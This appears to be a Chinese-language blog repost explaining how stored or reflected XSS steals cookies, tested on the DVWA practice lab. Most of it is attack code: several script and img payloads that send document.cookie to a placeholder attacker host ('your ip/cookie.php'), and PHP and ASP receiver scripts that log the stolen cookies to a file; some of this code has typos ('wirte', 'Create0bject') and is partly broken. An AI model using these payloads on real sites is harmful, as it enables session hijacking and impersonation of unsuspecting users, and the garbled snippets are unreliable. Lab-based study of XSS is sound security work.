xss盗取cookie原理剖析

这篇具有很好参考价值的文章主要介绍了xss盗取cookie原理剖析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

虽然cookie信息经过加密,即使被网络上一些别有用心的人截获也不必担心,但现在遇到的问题,窃取cookie的人不需要知道字符的含义,直接利用cookie通过服务器验证就可以冒充用户的身份

 假设一个网站有存储型xss(或反射xss),攻击者可以写入窃取cookie信息的恶意代码,在用户浏览xss网页时,触发恶意代码获取用户的cookie 

攻击者通常使用以下语句盗取用户cookie信息

<script>

document.location='http://your ip/cookie.php?cookie='+document.cookie;

</script>

<img src='http://your ip/cookie.php?cookie='+document.cookie></img>

<script>

new Image().src='http://your ip/cookie.php?cookie='+document.cookie;

</script>

<script>

img = new Image();

img.src='http://your ip/cookie.php?cookie='+document.cookie;

img.width = 0;

img.height = 0;

</script>

<script>

document.wirte('<img src='http://your ip/cookie.php?cookie='+document.cookie+ width=0 height=0 border=0 />');

</script>

在远程服务器,接受cookie代码

PHP版本

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>

ASP版本

<%
msg=Request . ServerVariables ("QUERY STRING")
testfile=Server . MapPath ("cookie. txt")
setfs=server .Create0bject ("scripting. filesystemobject")set thisfile=fs . OpenTextFile(testfile,8, True, 0)
thisfile. Writeline ("" &msg& "")
thisfile.close
set fs = nothing
%>

用DVWA靶场测试

修改页面最大长度限制

xss盗取cookie原理剖析

 插入盗取cookie的恶意代码

xss盗取cookie原理剖析

 查看接受cookie文件,可见盗取成功

xss盗取cookie原理剖析文章来源地址https://www.toymoban.com/news/detail-438797.html

到了这里,关于xss盗取cookie原理剖析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • XSS平台的简单搭建和获取cookie

    1.什么是XSS平台 XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的所有事情。包括但不限于:窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向

    2023年04月09日
    浏览(79)
  • 熊海CMS网站SQL注入、XSS攻击、cookie篡改

    CMS下载地址:https://www.jb51.net/codes/303119.html 代码审计,篡改cookie登录管理员界面 通过信息搜集找到了网站的源码 this. location =\\\'?r=index ,发现登录后台的URL 查看源码中登录验证的代码 分析:如果cookie中use为空,还是跳回到登录界面,所以user不为空,则跳过验证,实现cookie的篡

    2024年02月11日
    浏览(39)
  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(53)
  • 通过route , tracert , traceroute 查看本地路由配置及访问ip或域名时经过的路由信息

    在windows 系统或linux 系统访问 外网ip 或域名时,都会通过层层的路由器,然后将请求转发到最终的目标服务器;因为互联网通过路由器实现公网与局域网的联通; 区分下路由器和交换机在ip 请求解析过程中的区别: 1、路由器:最主要的功能可以理解为实现信息的转送。把这

    2024年02月05日
    浏览(48)
  • 黑客攻击实战案例:12种开源情报收集、缓冲区溢出漏洞挖掘、路径遍历漏洞、自定义参数Cookie参数绕过2FA、二维码的XSS、恶意文件上传清单、反射型XSS漏洞、威胁情报搜索引擎

    黑客攻击实战案例:12种开源情报收集、缓冲区溢出漏洞挖掘、路径遍历漏洞、自定义参数Cookie参数绕过2FA、二维码的XSS、恶意文件上传清单、反射型XSS漏洞、威胁情报搜索引擎。 目前漏洞挖掘的常用方法只有一种就是人工分析为主,漏洞挖掘在很大程度上是个人行为,漏洞

    2024年02月04日
    浏览(47)
  • beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等

    ✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆 🔥系列专栏 :XSS漏洞应用-Beef 📃新人博主 :欢迎点赞收藏关注,会回访! 💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付

    2024年02月02日
    浏览(44)
  • 【XSS漏洞-01】XSS漏洞原理和危害及验证与分类

    跨站脚本攻击——XSS(Cross Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或 跨站脚本攻击 。指攻击者通过在web页面中写入恶意脚本,进而在用户浏览页面时,控制用户浏览器进行操作的攻击方式。假设

    2024年02月12日
    浏览(42)
  • XSS漏洞及其原理(详解)

    XSS被称为跨站脚本攻击(Cross Site Scripting),由于和层叠样式表(Cascading Style Sheets,CSS)重名,改为XSS。 主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。 利用网页开发时web应用程序对用户输入过滤不足导致将恶意代码注入到网页中,使用户浏览器

    2024年04月15日
    浏览(36)
  • XSS漏洞原理

    XSS又叫CSS(Cross Site Script),跨站脚本攻击。因为与html中的css样式同,所以称之为XSS。 在OWASP top10,2013年度中排第三名,在OWASP top 10, 2017年度中排第7名。属于web应用中计算机安全漏洞,是恶意的web访问者将脚本植入到提供给用户使用的页面中,通常是使用JavaScript编写的危险代

    2024年01月24日
    浏览(35)
  • xss攻击原理与解决方法

    实施XSS攻击需要具备两个条件: 一、需要向web页面注入恶意代码; 二、这些恶意代码能够被浏览器成功的执行。 看一下下面这个例子: 这段代码在旧版的IE8和IE8以下的版本都是可以被执行的,火狐也能执行代码,但火狐对其禁止访问DOM对象,所以在火狐下执行将会看到控制

    2024年04月15日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包